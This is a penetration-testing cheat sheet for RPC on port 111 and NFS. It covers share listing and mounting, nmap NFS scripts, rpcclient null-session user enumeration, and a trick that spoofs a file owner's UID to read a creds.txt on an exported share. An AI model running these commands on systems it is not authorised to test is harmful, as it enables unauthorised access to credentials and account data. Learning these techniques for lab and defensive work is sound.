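# Port 111 - RPC (rpcbind / portmapper)

# Basic enum

# List the RPC programs registered with the portmapper (NFS shows up as nfs / mountd)
rpcinfo -p 192.168.1.101

# NFS shares

# List Shares
showmount -e 10.10.10.x

# Mount
# Create the mount point first. NFS options must follow -o: a bare "-nolock" is read
# by mount as the short flags -n plus "-o lock", i.e. the opposite of what is wanted.
# nolock skips the NFS lock manager (lockd/statd), which is usually unreachable on a target.
sudo mkdir -p /mnt/folderToMount
sudo mount -t nfs -o nolock 10.10.10.x:/folderShared /mnt/folderToMount

# Nmap
# Quote the script glob so the shell does not expand nfs* against the local directory
sudo nmap -p 111 --script "nfs*" 10.10.10.x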

If you get "permission denied" reading files inside the mounted directory, the export is squashing root (root_squash) but still honours other client UIDs; create a user on Kali with the same UID as the file owner (see below).

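# Exploit User UID permissions
# NFSv3 with AUTH_SYS (the common case) trusts whatever UID/GID the client presents,
# so a local user carrying the owner's UID can read the file. This needs an export
# without all_squash; root is normally squashed (root_squash), hence the
# "permission denied" when browsing the mount as root.

# Check who can view the files and get the UID (use the mount point from above)
ls -la /mnt/folderToMount
# -rwx------ 1 1014 1014 48 Jun 25 06:08 creds.txt

# Owner UID 1014 (group 1014) is the only principal allowed to read/execute creds.txt.
# Create a local user and set its UID/GID directly. usermod/groupmod touch only the
# pwn entries; a blanket 'sed -i s/1001/1014/g /etc/passwd' rewrites every 1001 in the
# file (other accounts, GIDs, substrings such as 11001) and assumes adduser chose 1001.
sudo adduser pwn
sudo groupmod -g 1014 pwn
sudo usermod -u 1014 -g 1014 pwn

# Read the file as pwn (or switch user with: su pwn)
sudo -u pwn cat /mnt/folderToMount/creds.txt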

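# Enumerate users
# NOTE: rpcclient talks MS-RPC over SMB (TCP 445/139) to Windows/Samba hosts; it does
# not use rpcbind on port 111. -N suppresses the password prompt for a null session.

rpcclient -U '' -N 10.10.10.x
rpcclient> enumdomusers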

# Connect with a null-session

Null sessions are disabled by default on current Windows versions (RestrictAnonymous / RestrictNullSessAccess), so this usually only works against older or deliberately weakened servers; otherwise a valid account is required.

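# Authenticated session (prompts for the password of james)
rpcclient -U james 10.10.10.52
# Null session: -N skips the password prompt (same as pressing Enter on it)
rpcclient -U '' -N 192.168.1.105

# Useful commands once inside the rpcclient shell
rpcclient> srvinfo
rpcclient> enumdomusers
rpcclient> enumalsgroups domain
rpcclient> lookupnames administrators
rpcclient> querydominfo
rpcclient> queryuser john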